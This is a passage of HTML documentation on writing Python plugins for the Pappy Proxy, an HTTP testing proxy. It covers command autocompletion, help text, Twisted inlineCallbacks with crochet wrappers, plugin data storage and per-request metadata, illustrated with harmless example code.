<p>You can also define a function to handle autocompletion for your command. In order to do this, you define a function that takes 4 arguments: <code class="docutils literal"><span class="pre">text</span></code>, <code class="docutils literal"><span class="pre">line</span></code>, <code class="docutils literal"><span class="pre">begidx</span></code>, and <code class="docutils literal"><span class="pre">endidx</span></code>. From the <a class="reference external" href="https://docs.python.org/2/library/cmd.html">Cmd docs</a>, this is what the arguments mean:</p>
<blockquote>
<div><code class="docutils literal"><span class="pre">text</span></code> is the string prefix we are attempting to match: all returned matches must begin with it. <code class="docutils literal"><span class="pre">line</span></code> is the current input line with leading whitespace removed, <code class="docutils literal"><span class="pre">begidx</span></code> and <code class="docutils literal"><span class="pre">endidx</span></code> are the beginning and ending indexes of the prefix text, which could be used to provide different completion depending upon which position the argument is in.</div></blockquote>
<p>Let&#8217;s let the user to autocomplete some names in our plugin:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;alice&#39;</span><span class="p">,</span> <span class="s1">&#39;allie&#39;</span><span class="p">,</span> <span class="s1">&#39;sarah&#39;</span><span class="p">,</span> <span class="s1">&#39;mallory&#39;</span><span class="p">,</span> <span class="s1">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="k">def</span> <span class="nf">put_on_rope_and_wizard_hat</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> puts on their robe and wizard hat&#39;</span> <span class="o">%</span> <span class="n">line</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;I put on my robe and wizard hat&#39;</span>
<span class="k">def</span> <span class="nf">complete_hello_world</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">line</span><span class="p">,</span> <span class="n">begidx</span><span class="p">,</span> <span class="n">endidx</span><span class="p">):</span>
<span class="k">return</span> <span class="p">[</span><span class="n">n</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">_AUTOCOMPLETE_NAMES</span> <span class="k">if</span> <span class="n">n</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="n">text</span><span class="p">)]</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="s1">&#39;wizard_hat&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">put_on_rope_and_wizard_hat</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;wizard_hat&#39;</span><span class="p">,</span> <span class="s1">&#39;wh&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>Then restart and run:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmp3J97rE
Proxy is listening on port 8000
pappy&gt; hello
alice allie mallory sarah slagathor
pappy&gt; hello allie
Hello, allie!
pappy&gt;
</pre></div>
</div>
<p>You can&#8217;t see it, but I hit tab twice after typing hello to get the completions to appear.</p>
</div>
<div class="section" id="adding-help">
<h3><a class="toc-backref" href="#id10">Adding Help</a><a class="headerlink" href="#adding-help" title="Permalink to this headline"></a></h3>
<p>Now let&#8217;s say we want to add some help to the command so that when the user runs <code class="docutils literal"><span class="pre">help</span> <span class="pre">hello</span></code> they get something useful. To do that, just add a docstring to your function:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;alice&#39;</span><span class="p">,</span> <span class="s1">&#39;allie&#39;</span><span class="p">,</span> <span class="s1">&#39;sarah&#39;</span><span class="p">,</span> <span class="s1">&#39;mallory&#39;</span><span class="p">,</span> <span class="s1">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="sd">&quot;&quot;&quot;</span>
<span class="sd"> Say hello to the world. Usage: hello [name]</span>
<span class="sd"> &quot;&quot;&quot;</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="k">def</span> <span class="nf">put_on_rope_and_wizard_hat</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> puts on their robe and wizard hat&#39;</span> <span class="o">%</span> <span class="n">line</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;I put on my robe and wizard hat&#39;</span>
<span class="k">def</span> <span class="nf">complete_hello_world</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">line</span><span class="p">,</span> <span class="n">begidx</span><span class="p">,</span> <span class="n">endidx</span><span class="p">):</span>
<span class="k">return</span> <span class="p">[</span><span class="n">n</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">_AUTOCOMPLETE_NAMES</span> <span class="k">if</span> <span class="n">n</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="n">text</span><span class="p">)]</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="s1">&#39;wizard_hat&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">put_on_rope_and_wizard_hat</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;wizard_hat&#39;</span><span class="p">,</span> <span class="s1">&#39;wh&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
</div>
<div class="section" id="using-defer-inlinecallbacks-with-a-command">
<h3><a class="toc-backref" href="#id11">Using defer.inlineCallbacks With a Command</a><a class="headerlink" href="#using-defer-inlinecallbacks-with-a-command" title="Permalink to this headline"></a></h3>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">If you are using inlineCallbacks, you can&#8217;t use any functions which are blocking versions of async functions. For example, you cannot use <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.save" title="pappyproxy.http.Request.save"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.save()</span></code></a> and must instead use <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.async_deep_save" title="pappyproxy.http.Request.async_deep_save"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.async_deep_save()</span></code></a>.</p>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">This tutorial won&#8217;t tell you how to use inlineCallbacks in general. Type &#8220;twisted inline callbacks&#8221; into google to figure out what they are. This is mainly just a reminder to use the <code class="docutils literal"><span class="pre">crochet</span></code> wrapper for console commands and warning you that some functions may return deferreds that you may have to deal with.</p>
</div>
<p>Since you&#8217;re writing a plugin, you&#8217;ll probably be using functions which return a deferred. And to keep things readable, you&#8217;ll want to use the <code class="docutils literal"><span class="pre">defer.inlineCallbacks</span></code> function wrapper. Unfortunately, you can&#8217;t bind async functions to commands. Luckily, there&#8217;s a library called <a class="reference external" href="https://pypi.python.org/pypi/crochet">crochet</a> which lets you add another wrapper to the function that lets it be used like a blocking function. Rather than talking about it, let&#8217;s write a plugin to call <a class="reference internal" href="pappyproxy.html#pappyproxy.util.load_reqlist" title="pappyproxy.util.load_reqlist"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.util.load_reqlist()</span></code></a> to print out some requests&#8217; hosts. Let&#8217;s start by pretending it&#8217;s a normal function:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="k">def</span> <span class="nf">print_hosts</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="c1"># It&#39;s supposed to return a list of requests, right?</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;The host for request </span><span class="si">%s</span><span class="s1"> is: </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
</pre></div>
</div>
<p>And we run it:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; print_hosts 1
Traceback (most recent call last):
File &quot;/usr/local/lib/python2.7/dist-packages/cmd2.py&quot;, line 788, in onecmd_plus_hooks
stop = self.onecmd(statement)
File &quot;/usr/local/lib/python2.7/dist-packages/cmd2.py&quot;, line 871, in onecmd
stop = func(statement)
File &quot;/home/supahacker/pappy/pappyproxy/console.py&quot;, line 15, in catch
func(*args, **kwargs)
File &quot;/home/supahacker/.pappy/plugins/hosts.py&quot;, line 7, in print_hosts
for r in reqs:
TypeError: iteration over non-sequence
iteration over non-sequence
pappy&gt;
</pre></div>
</div>
<p>Iteration over a non-sequence? what? Well, <a class="reference internal" href="pappyproxy.html#pappyproxy.util.load_reqlist" title="pappyproxy.util.load_reqlist"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.util.load_reqlist()</span></code></a> doesn&#8217;t actually return a list of requests. It returns a deferred which returns a list of requests. I&#8217;m not going into the details (look up some stuff on using inline callbacks with Twisted if you want more info), but the way to fix it is to slap an <code class="docutils literal"><span class="pre">inlineCallbacks</span></code> wrapper on the function and <code class="docutils literal"><span class="pre">yield</span></code> the result of the function. Now it looks like this:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="nd">@defer.inlineCallbacks</span>
<span class="k">def</span> <span class="nf">print_hosts</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="k">yield</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;The host for request </span><span class="si">%s</span><span class="s1"> is: </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
</pre></div>
</div>
<p>However, the console assumes that any functions it calls will be blocking. As a result, we need to add the <code class="docutils literal"><span class="pre">crochet.wait_for</span></code> wrapper:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">import</span> <span class="nn">crochet</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="nd">@crochet.wait_for</span><span class="p">(</span><span class="n">timeout</span><span class="o">=</span><span class="bp">None</span><span class="p">)</span>
<span class="nd">@defer.inlineCallbacks</span>
<span class="k">def</span> <span class="nf">print_hosts</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="k">yield</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;The host for request </span><span class="si">%s</span><span class="s1"> is: </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
</pre></div>
</div>
<p>And now we&#8217;re good! If you run it without the crochet wrapper, it may still work. However, since the console assumes any functions it calls will be blocking, not having the wrapper could lead to weird errors.</p>
</div>
</div>
<div class="section" id="plugin-api">
<h2><a class="toc-backref" href="#id12">Plugin API</a><a class="headerlink" href="#plugin-api" title="Permalink to this headline"></a></h2>
<p>There are also some useful functions that you can use to interact with the request history and the context. It&#8217;s somewhat limited for now, but for now you can at least look through history and create/send new requests. Hopefully the API will expand as people find themselves wanting to do new things. That means <strong>if you&#8217;re writing a plugin, let me know and I&#8217;ll add any APIs you need</strong>. For now at least, plugins will let you maintain state over the course of the session and let you define commands.</p>
<p>The best way to learn what you can do is to go through the <span class="xref std std-ref">pappyproxy-package</span> and look at all the available functions.</p>
<div class="section" id="api-functions">
<h3><a class="toc-backref" href="#id13">API Functions</a><a class="headerlink" href="#api-functions" title="Permalink to this headline"></a></h3>
<p>See <a class="reference internal" href="pappyproxy.html#module-pappyproxy.plugin" title="pappyproxy.plugin"><code class="xref py py-mod docutils literal"><span class="pre">pappyproxy.plugin</span></code></a> for docs on all the functions you can use. You can also use any of the functions provided for writing macros (and vice-versa).</p>
</div>
<div class="section" id="storing-data-on-disk">
<h3><a class="toc-backref" href="#id14">Storing Data on Disk</a><a class="headerlink" href="#storing-data-on-disk" title="Permalink to this headline"></a></h3>
<p>Unfortunately, you&#8217;re on your own if you want to store plugin specific stuff on disk. It&#8217;s also important that you store any data that is specific to a project in the same directory as the data file. This is to make sure that if you encrypt your project folder, you can be sure that no sensitive data about the test can be found anywhere else. The only time you should store anything outside of the current directory is to store global plugin settings, and even then it would probably be better to parse options from <code class="docutils literal"><span class="pre">config.config_dict</span></code>. Pappy doesn&#8217;t even store data outside of the project directory except for its CA certificates.</p>
<p>However, if your plugin is a special snowflake that needs to store unencrypted, global settings, you should create a directory for your plugin in <code class="docutils literal"><span class="pre">{config.DATA_DIR}/plugindata</span></code> and put your files there. But again, avoid this if you can.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Any project-specific data (ie anything that contains info about requests) should be stored in the project directory unless you have a really really good reason. This is because it must be possible to secure any sensitive data by encrypting the project folder and storing data outside of the directory will add complications.</p>
</div>
<div class="admonition warning">
<p class="first admonition-title">Warning</p>
<p class="last">Do not modify the data file schema. There is a good chance the schema will break in future versions of Pappy.</p>
</div>
</div>
<div class="section" id="storing-custom-request-metadata">
<h3><a class="toc-backref" href="#id15">Storing Custom Request Metadata</a><a class="headerlink" href="#storing-custom-request-metadata" title="Permalink to this headline"></a></h3>
<p><a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request" title="pappyproxy.http.Request"><code class="xref py py-class docutils literal"><span class="pre">pappyproxy.http.Request</span></code></a> objects have a <code class="docutils literal"><span class="pre">plugin_data</span></code> attribute. It is a dictionary that is intended to be used by plugins to give the request custom metadata. If you want to store metadata about a request, it is suggested that you add a key to this dictionary and store any metadata you want under that key. You can use <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.get_plugin_dict" title="pappyproxy.http.Request.get_plugin_dict"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.get_plugin_dict()</span></code></a> to get a dictionary for a specific name. It will create an entry for that name if it doesn&#8217;t exist. I also suggest defining a function plugin-wide for getting the plugin&#8217;s data dict from a specific request. Since dictionaries are always passed by reference, any modifications you make to the returned dict will be applied to the request as well.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">You will need to save the request using something like <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.save" title="pappyproxy.http.Request.save"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.save()</span></code></a> or <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.async_deep_save" title="pappyproxy.http.Request.async_deep_save"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.async_deep_save()</span></code></a> in order to store the changes in the data file.</p>
</div>
<p>Here is an example plugin for storing the user-agent (if it exists) in the <code class="docutils literal"><span class="pre">plugin_data</span></code> dict of a request under the key <code class="docutils literal"><span class="pre">agent</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">crochet</span>
<span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">pappyproxy.plugin</span> <span class="kn">import</span> <span class="n">main_context</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">PappyException</span>
<span class="n">DATA_KEY</span> <span class="o">=</span> <span class="s1">&#39;agent&#39;</span>
<span class="k">def</span> <span class="nf">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">):</span>
<span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">get_plugin_dict</span><span class="p">(</span><span class="n">DATA_KEY</span><span class="p">)</span>
<span class="nd">@crochet.wait_for</span><span class="p">(</span><span class="n">timeout</span><span class="o">=</span><span class="bp">None</span><span class="p">)</span>
<span class="nd">@defer.inlineCallbacks</span>
<span class="k">def</span> <span class="nf">update_agent_metadata</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">main_context</span><span class="p">()</span><span class="o">.</span><span class="n">active_requests</span><span class="p">:</span>
<span class="k">if</span> <span class="s1">&#39;user-agent&#39;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">:</span>
<span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">)[</span><span class="s1">&#39;agent&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">&#39;user-agent&#39;</span><span class="p">]</span>
<span class="k">yield</span> <span class="n">r</span><span class="o">.</span><span class="n">async_deep_save</span><span class="p">()</span>
<span class="nd">@crochet.wait_for</span><span class="p">(</span><span class="n">timeout</span><span class="o">=</span><span class="bp">None</span><span class="p">)</span>
<span class="nd">@defer.inlineCallbacks</span>
<span class="k">def</span> <span class="nf">view_agent</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="k">yield</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">if</span> <span class="s1">&#39;agent&#39;</span> <span class="ow">in</span> <span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">):</span>
<span class="k">print</span> <span class="s1">&#39;The user agent for </span><span class="si">%s</span><span class="s1"> is &quot;</span><span class="si">%s</span><span class="s1">&quot;&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">)[</span><span class="s1">&#39;agent&#39;</span><span class="p">])</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;Request </span><span class="si">%s</span><span class="s1"> has no user agent data&#39;</span> <span class="o">%</span> <span class="n">r</span><span class="o">.</span><span class="n">reqid</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;agent_update&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">update_agent_metadata</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;view_agent&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">view_agent</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
</pre></div>
</div>
</div>
<div class="section" id="useful-functions">
<h3><a class="toc-backref" href="#id16">Useful Functions</a><a class="headerlink" href="#useful-functions" title="Permalink to this headline"></a></h3>
<p>See <a class="reference internal" href="pappyproxy.html#module-pappyproxy.plugin" title="pappyproxy.plugin"><code class="xref py py-mod docutils literal"><span class="pre">pappyproxy.plugin</span></code></a> and <a class="reference internal" href="pappyproxy.html#module-pappyproxy.util" title="pappyproxy.util"><code class="xref py py-mod docutils literal"><span class="pre">pappyproxy.util</span></code></a> for useful functions</p>
</div>
</div>
<div class="section" id="built-in-plugins-as-examples">
<h2><a class="toc-backref" href="#id17">Built In Plugins As Examples</a><a class="headerlink" href="#built-in-plugins-as-examples" title="Permalink to this headline"></a></h2>
<div class="section" id="built-in-plugins">
<h3><a class="toc-backref" href="#id18">Built In Plugins</a><a class="headerlink" href="#built-in-plugins" title="Permalink to this headline"></a></h3>
<p>All the commands in Pappy are implemented as plugins. I have done what I could to avoid using internal functions as much as I could, but there are still some instances where I had to implement an internal function in order to get the functions I needed. However, you can still look them over to see how things are structured and see some examples of semi-complicated plugins.</p>
</div>
<div class="section" id="interceptor-and-repeater">
<h3><a class="toc-backref" href="#id19">Interceptor and Repeater</a><a class="headerlink" href="#interceptor-and-repeater" title="Permalink to this headline"></a></h3>
<p>Pappy&#8217;s interceptor and repeater are fully implemented as a plugin. It defines an intercepting macro that handles saving then editing messages and commands that read those files and edit them. It relies on Twisted to switch between the macro handling the request and the command modifying it, so if you want to make something similar, you&#8217;ll have to learn how to use deferreds.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
<h3><a href="index.html">Table Of Contents</a></h3>
<ul>
<li><a class="reference internal" href="#">Writing Plugins for the Pappy Proxy</a><ul>
<li><a class="reference internal" href="#introduction">Introduction</a><ul>
<li><a class="reference internal" href="#should-i-write-a-plugin-or-a-macro">Should I Write a Plugin or a Macro?</a></li>
<li><a class="reference internal" href="#plugins-get-merged">Plugins Get Merged</a></li>
</ul>
</li>
<li><a class="reference internal" href="#creating-a-plugin">Creating a Plugin</a><ul>
<li><a class="reference internal" href="#writing-a-hello-world-plugin">Writing a Hello World Plugin</a></li>
<li><a class="reference internal" href="#passing-arguments-to-your-function">Passing Arguments to Your Function</a></li>
<li><a class="reference internal" href="#adding-more-aliases">Adding More Aliases</a></li>
<li><a class="reference internal" href="#adding-another-command">Adding Another Command</a></li>
<li><a class="reference internal" href="#adding-autocompletion">Adding Autocompletion</a></li>
<li><a class="reference internal" href="#adding-help">Adding Help</a></li>
<li><a class="reference internal" href="#using-defer-inlinecallbacks-with-a-command">Using defer.inlineCallbacks With a Command</a></li>
</ul>
</li>
<li><a class="reference internal" href="#plugin-api">Plugin API</a><ul>
<li><a class="reference internal" href="#api-functions">API Functions</a></li>
<li><a class="reference internal" href="#storing-data-on-disk">Storing Data on Disk</a></li>
<li><a class="reference internal" href="#storing-custom-request-metadata">Storing Custom Request Metadata</a></li>
<li><a class="reference internal" href="#useful-functions">Useful Functions</a></li>
</ul>
</li>
<li><a class="reference internal" href="#built-in-plugins-as-examples">Built In Plugins As Examples</a><ul>
<li><a class="reference internal" href="#built-in-plugins">Built In Plugins</a></li>
<li><a class="reference internal" href="#interceptor-and-repeater">Interceptor and Repeater</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<h4>Previous topic</h4>
<p class="topless"><a href="tutorial.html"
title="previous chapter">The Pappy Proxy Tutorial</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="contributing.html"
title="next chapter">Contributing</a></p>
<div role="note" aria-label="source link">
<h3>This Page</h3>
<ul class="this-page-menu">
<li><a href="_sources/pappyplugins.txt"
rel="nofollow">Show Source</a></li>
</ul>
</div>
<div id="searchbox" style="display: none" role="search">
<h3>Quick search</h3>
<form class="search" action="search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
